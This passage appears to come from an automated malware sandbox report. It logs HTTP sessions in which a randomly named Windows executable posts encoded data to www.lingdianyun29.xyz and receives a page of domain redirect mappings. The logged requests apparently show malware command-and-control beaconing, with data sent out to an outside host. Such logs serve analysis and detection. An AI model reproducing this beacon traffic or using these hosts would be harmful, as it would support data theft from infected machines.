                                                                        Nov 28, 2024 09:15:58.512721062 CET1236INData Raw: 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70 70 69 6e 67 73 2e 73 65 74 28 22 30 64 69 61 6e 79 75 6e 31 30 2e 78 79 7a 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70
                                                                        Data Ascii: ttps://0dyos.com");mappings.set("0dianyun10.xyz", "https://0dyos.com");mappings.set("0dianyun18.xyz", "https://0dyos.com");mappings.set("00dianyun2.xyz", "https://0dyos.com");mappings.set("0dianyun1.xyz", "https://0dyos.com");
                                                                        Nov 28, 2024 09:15:58.512983084 CET224INData Raw: 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70 70 69 6e 67 73 2e 73 65 74 28 22 77 77 77 2e 30 64 69 61 6e 79 75 6e 31 38 2e 78 79 7a 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a
                                                                        Data Ascii: "https://0dyos.com");mappings.set("www.0dianyun18.xyz", "https://0dyos.com");mappings.set("www.lingdianyun4.top", "https://0dyos.com");mappings.set("www.0dy123.xyz", "https://0dyos.com");mappings.set("www.0dy
                                                                        Nov 28, 2024 09:15:58.513514996 CET1236INData Raw: 76 73 2e 78 79 7a 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70 70 69 6e 67 73 2e 73 65 74 28 22 77 77 77 2e 6c 69 6e 67 64 69 61 6e 79 75 6e 33 31 2e 78 79 7a 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30
                                                                        Data Ascii: vs.xyz", "https://0dyos.com");mappings.set("www.lingdianyun31.xyz", "https://0dyos.com");mappings.set("lingdianyun18.top", "https://0dyos.com");mappings.set("lingdianyun21.xyz", "https://0dyos.com");mappings.set("www.lingdianyu
                                                                        Nov 28, 2024 09:15:58.513668060 CET224INData Raw: 61 6e 79 75 6e 38 2e 78 79 7a 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70 70 69 6e 67 73 2e 73 65 74 28 22 30 30 64 69 61 6e 79 75 6e 34 2e 78 79 7a 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f
                                                                        Data Ascii: anyun8.xyz", "https://0dyos.com");mappings.set("00dianyun4.xyz", "https://0dyos.com");mappings.set("lingdianyun12.xyz", "https://0dyos.com");mappings.set("0dyvs.xyz", "https://0dyos.com");mappings.set("000dia
                                                                        Nov 28, 2024 09:15:58.514084101 CET1236INData Raw: 6e 79 75 6e 2e 74 6f 70 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70 70 69 6e 67 73 2e 73 65 74 28 22 6c 69 6e 67 64 69 61 6e 79 75 6e 32 34 2e 78 79 7a 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79
                                                                        Data Ascii: nyun.top", "https://0dyos.com");mappings.set("lingdianyun24.xyz", "https://0dyos.com");mappings.set("www.lingdianyun30.xyz", "https://0dyos.com");mappings.set("lingdianyun28.top", "https://0dyos.com");mappings.set("www.0dy02.to
                                                                        Nov 28, 2024 09:15:58.514262915 CET224INData Raw: 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70 70 69 6e 67 73 2e 73 65 74 28 22 6c 69 6e 67 64 69 61 6e 79 75 6e 30 32 2e 78 79 7a 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70 70
                                                                        Data Ascii: ://0dyos.com");mappings.set("lingdianyun02.xyz", "https://0dyos.com");mappings.set("lingdianyun23.xyz", "https://0dyos.com");mappings.set("www.00dianyun1.xyz", "https://0dyos.com");mappings.set("www.lingdiany
                                                                        Nov 28, 2024 09:15:58.514750957 CET1236INData Raw: 75 6e 32 34 2e 74 6f 70 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70 70 69 6e 67 73 2e 73 65 74 28 22 6c 69 6e 67 64 69 61 6e 79 75 6e 32 36 2e 74 6f 70 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79
                                                                        Data Ascii: un24.top", "https://0dyos.com");mappings.set("lingdianyun26.top", "https://0dyos.com");mappings.set("www.0dyvs.top", "https://0dyos.com");mappings.set("www.lingdianyun20.top", "https://0dyos.com");mappings.set("www.lingdianyun1
                                                                        Nov 28, 2024 09:15:58.514883995 CET224INData Raw: 67 73 2e 73 65 74 28 22 30 64 79 65 73 2e 78 79 7a 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70 70 69 6e 67 73 2e 73 65 74 28 22 6c 69 6e 67 64 69 61 6e 79 75 6e 37 2e 78 79 7a 22 2c 20 22 68 74 74
                                                                        Data Ascii: gs.set("0dyes.xyz", "https://0dyos.com");mappings.set("lingdianyun7.xyz", "https://0dyos.com");mappings.set("www.lingdianyun07.top", "https://0dyos.com");mappings.set("www.vdoos.com", "https://0dyos.com");map
                                                                        Nov 28, 2024 09:15:58.632505894 CET1236INData Raw: 70 69 6e 67 73 2e 73 65 74 28 22 30 30 64 69 61 6e 79 75 6e 31 2e 78 79 7a 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70 70 69 6e 67 73 2e 73 65 74 28 22 6c 69 6e 67 64 69 61 6e 79 75 6e 31 37 2e 74
                                                                        Data Ascii: pings.set("00dianyun1.xyz", "https://0dyos.com");mappings.set("lingdianyun17.top", "https://0dyos.com");mappings.set("www.lingdianyun15.top", "https://0dyos.com");mappings.set("lingdianyun9.xyz", "https://0dyos.com");mappings.s


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        31192.168.2.550013121.43.155.35802848C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 28, 2024 09:15:59.688683987 CET1848OUTPOST /404o/ HTTP/1.1
                                                                        Host: www.lingdianyun29.xyz
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-us
                                                                        Accept-Encoding: gzip, deflate
                                                                        Connection: close
                                                                        Content-Length: 1244
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Origin: http://www.lingdianyun29.xyz
                                                                        Referer: http://www.lingdianyun29.xyz/404o/
                                                                        User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                        Data Raw: 51 68 4b 78 68 4e 50 3d 62 49 70 77 75 6a 78 48 31 6d 51 78 48 6f 48 65 77 37 52 69 66 52 78 66 62 74 70 61 42 65 4e 65 6f 6b 55 67 62 44 34 6b 44 50 52 51 53 41 4b 46 31 48 34 33 66 37 75 77 68 4b 5a 51 38 2b 6f 75 6d 42 46 43 58 30 33 32 56 6b 42 57 62 50 74 7a 4d 56 42 66 72 4d 75 37 76 4a 53 36 62 64 52 4b 45 33 54 33 71 6e 4a 6a 77 6f 59 49 36 67 67 4c 32 49 7a 42 67 31 42 46 32 46 35 57 31 37 78 75 4b 45 62 58 58 43 73 71 30 4b 74 36 47 46 50 51 6c 37 55 73 4a 6e 46 7a 47 68 47 77 6e 4b 43 44 6f 56 55 42 77 64 32 49 71 77 62 38 68 6b 67 57 7a 6b 48 38 48 36 6b 56 36 74 45 34 30 63 4e 64 49 30 62 56 2b 76 4a 4c 56 78 49 76 47 51 72 61 72 68 75 67 31 70 47 68 64 7a 34 67 6a 32 56 6e 58 41 37 4c 44 58 34 2b 2f 58 45 35 58 50 47 44 56 52 68 34 59 6c 37 36 49 54 51 79 56 56 55 59 34 63 47 31 6a 76 4d 76 6a 77 30 78 51 39 73 68 43 53 62 62 55 75 48 44 66 58 6d 59 6e 30 59 2f 73 6e 47 53 6f 4e 7a 6f 64 50 36 65 30 4b 44 4d 77 64 50 35 32 47 44 50 4f 69 66 6a 4b 7a 41 67 77 41 4b 53 6e 39 72 47 36 75 [TRUNCATED]
                                                                        Data Ascii: QhKxhNP=bIpwujxH1mQxHoHew7RifRxfbtpaBeNeokUgbD4kDPRQSAKF1H43f7uwhKZQ8+oumBFCX032VkBWbPtzMVBfrMu7vJS6bdRKE3T3qnJjwoYI6ggL2IzBg1BF2F5W17xuKEbXXCsq0Kt6GFPQl7UsJnFzGhGwnKCDoVUBwd2Iqwb8hkgWzkH8H6kV6tE40cNdI0bV+vJLVxIvGQrarhug1pGhdz4gj2VnXA7LDX4+/XE5XPGDVRh4Yl76ITQyVVUY4cG1jvMvjw0xQ9shCSbbUuHDfXmYn0Y/snGSoNzodP6e0KDMwdP52GDPOifjKzAgwAKSn9rG6uNk/sgg2XYptXO3g+yHwBcf9ZkNyQ1Ayr7tSsLW1Fco4nDZDZHBz0jmNXHwikIoRm7MSNBwJwFC1tpiejcrD75+f4xbznx7da8ydzBWP7poPOQKVRecJk4XyUVvXkEP+jYQ1+a2zuIA/Cy4lZj0d1AWS82DEQwDasFzKZ185QP4Pxm4dAh9kcgBqqeo03bWDV9eaQqJIL6dQyORlrAXSokgYLzraC28QVJ94TU7jdgvmdDP/XbnrDgiEgCRE/yGl13E2WrdXQGjq8k50Io548eK+26Gf800NT1ezWYCNFbD/ZUGA0/Hdatxxe94AQUcykXb80xjmgEjt+nW5duQJMZhcSad8eMU2c/hZynoIn7cUyq/L9ypk6bPPlqTg71yHvPPcgKl6RmPT0lysU67q0AmZSBs5VAUYNrbszNaJKy3zPM2p9zj3eXuxD8DoDukG/0F2kajWLXwHvJhqFryX9UmwzPvrAWPIvVVyeik4POLjxoakUFP3KD4ipUfvxBk/tdDLb2xb+CaQ3SaT+vOUFmAi5XhsXdKp5zsr8A8rxB5GqEOVFx4Q3i/yLtvqYH2wkooWFuzPgIEUyg0a0Ax16ffbipqBJLExscGvKh5Pkt2+cCqSJfGodkH0Me3XQYvt8mM/ba++wrpiMBL+neggcMaPwp33XOuj9mx [TRUNCATED]
                                                                        Nov 28, 2024 09:16:01.158471107 CET1236INHTTP/1.1 200 OK
                                                                        Content-Type: text/html
                                                                        Content-Length: 14605
                                                                        Connection: close
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 09 09 09 76 61 72 20 6d 61 70 70 69 6e 67 73 20 3d 20 6e 65 77 20 4d 61 70 28 29 3b 0a 09 09 09 6d 61 70 70 69 6e 67 73 2e 73 65 74 28 22 77 77 77 2e 30 64 69 61 6e 79 75 6e 38 2e 78 79 7a 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70 70 69 6e 67 73 2e 73 65 74 28 22 30 30 30 30 30 63 6c 6f 75 64 2e 74 6f 70 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70 70 69 6e 67 73 2e 73 65 74 28 22 6c 69 6e 67 64 69 61 6e 79 75 6e 30 37 2e 74 6f 70 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70 70 69 6e 67 73 2e 73 65 74 28 22 6c 69 6e 67 64 69 61 6e 79 75 6e 34 2e 78 79 7a 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70 70 69 6e 67 73 2e [TRUNCATED]
                                                                        Data Ascii: <!DOCTYPE html><html><head><script type="text/javascript">var mappings = new Map();mappings.set("www.0dianyun8.xyz", "https://0dyos.com");mappings.set("00000cloud.top", "https://0dyos.com");mappings.set("lingdianyun07.top", "https://0dyos.com");mappings.set("lingdianyun4.xyz", "https://0dyos.com");mappings.set("www.00000cloud.top", "https://0dyos.com");mappings.set("lingdianyun15.top", "https://0dyos.com");mappings.set("lingdianyun26.xyz", "https://0dyos.com");mappings.set("www.0dianyun17.xyz", "https://0dyos.com");mappings.set("www.0cloud2.top", "https://0dyos.com");mappings.set("www.lingdianyun19.top", "https://0dyos.com");mappings.set("lingdianyun39.top", "https://0dyos.com");mappings.set("lingdianyun16.xyz", "https://0dyos.com");mappings.set("www.0dianyun13.xyz", "https://0dyos.com");mappings.set("www.00dianyun3.xyz", "https://0dyos.com");mappings.set("lingdianyun25.xyz", "https://0dyos.com");mappings.set("www.lingdianyu [TRUNCATED]
                                                                        Nov 28, 2024 09:16:01.158634901 CET224INData Raw: 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70 70 69 6e 67 73 2e 73 65 74 28 22 77 77 77 2e 6c 69 6e 67 64 69 61 6e 79 75 6e 33 31 2e 74 6f 70 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09
                                                                        Data Ascii: ://0dyos.com");mappings.set("www.lingdianyun31.top", "https://0dyos.com");mappings.set("0dianyun3.xyz", "https://0dyos.com");mappings.set("0dy01.top", "https://0dyos.com");mappings.set("www.0dianyun3.xyz", "h
                                                                        Nov 28, 2024 09:16:01.159358978 CET1236INData Raw: 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70 70 69 6e 67 73 2e 73 65 74 28 22 30 64 69 61 6e 79 75 6e 31 30 2e 78 79 7a 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70
                                                                        Data Ascii: ttps://0dyos.com");mappings.set("0dianyun10.xyz", "https://0dyos.com");mappings.set("0dianyun18.xyz", "https://0dyos.com");mappings.set("00dianyun2.xyz", "https://0dyos.com");mappings.set("0dianyun1.xyz", "https://0dyos.com");
                                                                        Nov 28, 2024 09:16:01.159503937 CET224INData Raw: 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70 70 69 6e 67 73 2e 73 65 74 28 22 77 77 77 2e 30 64 69 61 6e 79 75 6e 31 38 2e 78 79 7a 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a
                                                                        Data Ascii: "https://0dyos.com");mappings.set("www.0dianyun18.xyz", "https://0dyos.com");mappings.set("www.lingdianyun4.top", "https://0dyos.com");mappings.set("www.0dy123.xyz", "https://0dyos.com");mappings.set("www.0dy
                                                                        Nov 28, 2024 09:16:01.160017967 CET1236INData Raw: 76 73 2e 78 79 7a 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70 70 69 6e 67 73 2e 73 65 74 28 22 77 77 77 2e 6c 69 6e 67 64 69 61 6e 79 75 6e 33 31 2e 78 79 7a 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30
                                                                        Data Ascii: vs.xyz", "https://0dyos.com");mappings.set("www.lingdianyun31.xyz", "https://0dyos.com");mappings.set("lingdianyun18.top", "https://0dyos.com");mappings.set("lingdianyun21.xyz", "https://0dyos.com");mappings.set("www.lingdianyu
                                                                        Nov 28, 2024 09:16:01.160193920 CET224INData Raw: 61 6e 79 75 6e 38 2e 78 79 7a 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70 70 69 6e 67 73 2e 73 65 74 28 22 30 30 64 69 61 6e 79 75 6e 34 2e 78 79 7a 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f
                                                                        Data Ascii: anyun8.xyz", "https://0dyos.com");mappings.set("00dianyun4.xyz", "https://0dyos.com");mappings.set("lingdianyun12.xyz", "https://0dyos.com");mappings.set("0dyvs.xyz", "https://0dyos.com");mappings.set("000dia
                                                                        Nov 28, 2024 09:16:01.160522938 CET1236INData Raw: 6e 79 75 6e 2e 74 6f 70 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70 70 69 6e 67 73 2e 73 65 74 28 22 6c 69 6e 67 64 69 61 6e 79 75 6e 32 34 2e 78 79 7a 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79
                                                                        Data Ascii: nyun.top", "https://0dyos.com");mappings.set("lingdianyun24.xyz", "https://0dyos.com");mappings.set("www.lingdianyun30.xyz", "https://0dyos.com");mappings.set("lingdianyun28.top", "https://0dyos.com");mappings.set("www.0dy02.to
                                                                        Nov 28, 2024 09:16:01.160713911 CET224INData Raw: 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70 70 69 6e 67 73 2e 73 65 74 28 22 6c 69 6e 67 64 69 61 6e 79 75 6e 30 32 2e 78 79 7a 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70 70
                                                                        Data Ascii: ://0dyos.com");mappings.set("lingdianyun02.xyz", "https://0dyos.com");mappings.set("lingdianyun23.xyz", "https://0dyos.com");mappings.set("www.00dianyun1.xyz", "https://0dyos.com");mappings.set("www.lingdiany
                                                                        Nov 28, 2024 09:16:01.161035061 CET1236INData Raw: 75 6e 32 34 2e 74 6f 70 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70 70 69 6e 67 73 2e 73 65 74 28 22 6c 69 6e 67 64 69 61 6e 79 75 6e 32 36 2e 74 6f 70 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79
                                                                        Data Ascii: un24.top", "https://0dyos.com");mappings.set("lingdianyun26.top", "https://0dyos.com");mappings.set("www.0dyvs.top", "https://0dyos.com");mappings.set("www.lingdianyun20.top", "https://0dyos.com");mappings.set("www.lingdianyun1
                                                                        Nov 28, 2024 09:16:01.161178112 CET224INData Raw: 67 73 2e 73 65 74 28 22 30 64 79 65 73 2e 78 79 7a 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70 70 69 6e 67 73 2e 73 65 74 28 22 6c 69 6e 67 64 69 61 6e 79 75 6e 37 2e 78 79 7a 22 2c 20 22 68 74 74
                                                                        Data Ascii: gs.set("0dyes.xyz", "https://0dyos.com");mappings.set("lingdianyun7.xyz", "https://0dyos.com");mappings.set("www.lingdianyun07.top", "https://0dyos.com");mappings.set("www.vdoos.com", "https://0dyos.com");map
                                                                        Nov 28, 2024 09:16:01.278723955 CET1236INData Raw: 70 69 6e 67 73 2e 73 65 74 28 22 30 30 64 69 61 6e 79 75 6e 31 2e 78 79 7a 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70 70 69 6e 67 73 2e 73 65 74 28 22 6c 69 6e 67 64 69 61 6e 79 75 6e 31 37 2e 74
                                                                        Data Ascii: pings.set("00dianyun1.xyz", "https://0dyos.com");mappings.set("lingdianyun17.top", "https://0dyos.com");mappings.set("www.lingdianyun15.top", "https://0dyos.com");mappings.set("lingdianyun9.xyz", "https://0dyos.com");mappings.s


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        32192.168.2.550014121.43.155.35802848C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 28, 2024 09:16:02.334196091 CET547OUTGET /404o/?QhKxhNP=WKBQtURp4mxoG42HvJVFdxkBeoRQKLcKkncaZCQ6BKNKWWSe5DM6Y469mdl3/OFUlQwZCGrNWgxnPoxBbE5j38LAsK6uFZ8oMmHn4Vx5wOob/Qku77DXil1QxQESxukZTQ==&Yby=d2ydCtHpb8 HTTP/1.1
                                                                        Host: www.lingdianyun29.xyz
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-us
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                        Nov 28, 2024 09:16:03.757971048 CET1236INHTTP/1.1 200 OK
                                                                        Content-Type: text/html
                                                                        Content-Length: 14605
                                                                        Connection: close
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 09 09 09 76 61 72 20 6d 61 70 70 69 6e 67 73 20 3d 20 6e 65 77 20 4d 61 70 28 29 3b 0a 09 09 09 6d 61 70 70 69 6e 67 73 2e 73 65 74 28 22 77 77 77 2e 30 64 69 61 6e 79 75 6e 38 2e 78 79 7a 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70 70 69 6e 67 73 2e 73 65 74 28 22 30 30 30 30 30 63 6c 6f 75 64 2e 74 6f 70 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70 70 69 6e 67 73 2e 73 65 74 28 22 6c 69 6e 67 64 69 61 6e 79 75 6e 30 37 2e 74 6f 70 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70 70 69 6e 67 73 2e 73 65 74 28 22 6c 69 6e 67 64 69 61 6e 79 75 6e 34 2e 78 79 7a 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70 70 69 6e 67 73 2e [TRUNCATED]
                                                                        Data Ascii: <!DOCTYPE html><html><head><script type="text/javascript">var mappings = new Map();mappings.set("www.0dianyun8.xyz", "https://0dyos.com");mappings.set("00000cloud.top", "https://0dyos.com");mappings.set("lingdianyun07.top", "https://0dyos.com");mappings.set("lingdianyun4.xyz", "https://0dyos.com");mappings.set("www.00000cloud.top", "https://0dyos.com");mappings.set("lingdianyun15.top", "https://0dyos.com");mappings.set("lingdianyun26.xyz", "https://0dyos.com");mappings.set("www.0dianyun17.xyz", "https://0dyos.com");mappings.set("www.0cloud2.top", "https://0dyos.com");mappings.set("www.lingdianyun19.top", "https://0dyos.com");mappings.set("lingdianyun39.top", "https://0dyos.com");mappings.set("lingdianyun16.xyz", "https://0dyos.com");mappings.set("www.0dianyun13.xyz", "https://0dyos.com");mappings.set("www.00dianyun3.xyz", "https://0dyos.com");mappings.set("lingdianyun25.xyz", "https://0dyos.com");mappings.set("www.lingdianyu [TRUNCATED]
                                                                        Nov 28, 2024 09:16:03.758352995 CET224INData Raw: 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70 70 69 6e 67 73 2e 73 65 74 28 22 77 77 77 2e 6c 69 6e 67 64 69 61 6e 79 75 6e 33 31 2e 74 6f 70 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09
                                                                        Data Ascii: ://0dyos.com");mappings.set("www.lingdianyun31.top", "https://0dyos.com");mappings.set("0dianyun3.xyz", "https://0dyos.com");mappings.set("0dy01.top", "https://0dyos.com");mappings.set("www.0dianyun3.xyz", "h
                                                                        Nov 28, 2024 09:16:03.758719921 CET1236INData Raw: 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70 70 69 6e 67 73 2e 73 65 74 28 22 30 64 69 61 6e 79 75 6e 31 30 2e 78 79 7a 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70
                                                                        Data Ascii: ttps://0dyos.com");mappings.set("0dianyun10.xyz", "https://0dyos.com");mappings.set("0dianyun18.xyz", "https://0dyos.com");mappings.set("00dianyun2.xyz", "https://0dyos.com");mappings.set("0dianyun1.xyz", "https://0dyos.com");
                                                                        Nov 28, 2024 09:16:03.758936882 CET224INData Raw: 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70 70 69 6e 67 73 2e 73 65 74 28 22 77 77 77 2e 30 64 69 61 6e 79 75 6e 31 38 2e 78 79 7a 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a
                                                                        Data Ascii: "https://0dyos.com");mappings.set("www.0dianyun18.xyz", "https://0dyos.com");mappings.set("www.lingdianyun4.top", "https://0dyos.com");mappings.set("www.0dy123.xyz", "https://0dyos.com");mappings.set("www.0dy
                                                                        Nov 28, 2024 09:16:03.758956909 CET1236INData Raw: 76 73 2e 78 79 7a 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70 70 69 6e 67 73 2e 73 65 74 28 22 77 77 77 2e 6c 69 6e 67 64 69 61 6e 79 75 6e 33 31 2e 78 79 7a 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30
                                                                        Data Ascii: vs.xyz", "https://0dyos.com");mappings.set("www.lingdianyun31.xyz", "https://0dyos.com");mappings.set("lingdianyun18.top", "https://0dyos.com");mappings.set("lingdianyun21.xyz", "https://0dyos.com");mappings.set("www.lingdianyu
                                                                        Nov 28, 2024 09:16:03.758980036 CET224INData Raw: 61 6e 79 75 6e 38 2e 78 79 7a 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70 70 69 6e 67 73 2e 73 65 74 28 22 30 30 64 69 61 6e 79 75 6e 34 2e 78 79 7a 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f
                                                                        Data Ascii: anyun8.xyz", "https://0dyos.com");mappings.set("00dianyun4.xyz", "https://0dyos.com");mappings.set("lingdianyun12.xyz", "https://0dyos.com");mappings.set("0dyvs.xyz", "https://0dyos.com");mappings.set("000dia
                                                                        Nov 28, 2024 09:16:03.759073019 CET1236INData Raw: 6e 79 75 6e 2e 74 6f 70 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70 70 69 6e 67 73 2e 73 65 74 28 22 6c 69 6e 67 64 69 61 6e 79 75 6e 32 34 2e 78 79 7a 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79
                                                                        Data Ascii: nyun.top", "https://0dyos.com");mappings.set("lingdianyun24.xyz", "https://0dyos.com");mappings.set("www.lingdianyun30.xyz", "https://0dyos.com");mappings.set("lingdianyun28.top", "https://0dyos.com");mappings.set("www.0dy02.to
                                                                        Nov 28, 2024 09:16:03.759202003 CET224INData Raw: 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70 70 69 6e 67 73 2e 73 65 74 28 22 6c 69 6e 67 64 69 61 6e 79 75 6e 30 32 2e 78 79 7a 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70 70
                                                                        Data Ascii: ://0dyos.com");mappings.set("lingdianyun02.xyz", "https://0dyos.com");mappings.set("lingdianyun23.xyz", "https://0dyos.com");mappings.set("www.00dianyun1.xyz", "https://0dyos.com");mappings.set("www.lingdiany
                                                                        Nov 28, 2024 09:16:03.759721041 CET1236INData Raw: 75 6e 32 34 2e 74 6f 70 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70 70 69 6e 67 73 2e 73 65 74 28 22 6c 69 6e 67 64 69 61 6e 79 75 6e 32 36 2e 74 6f 70 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79
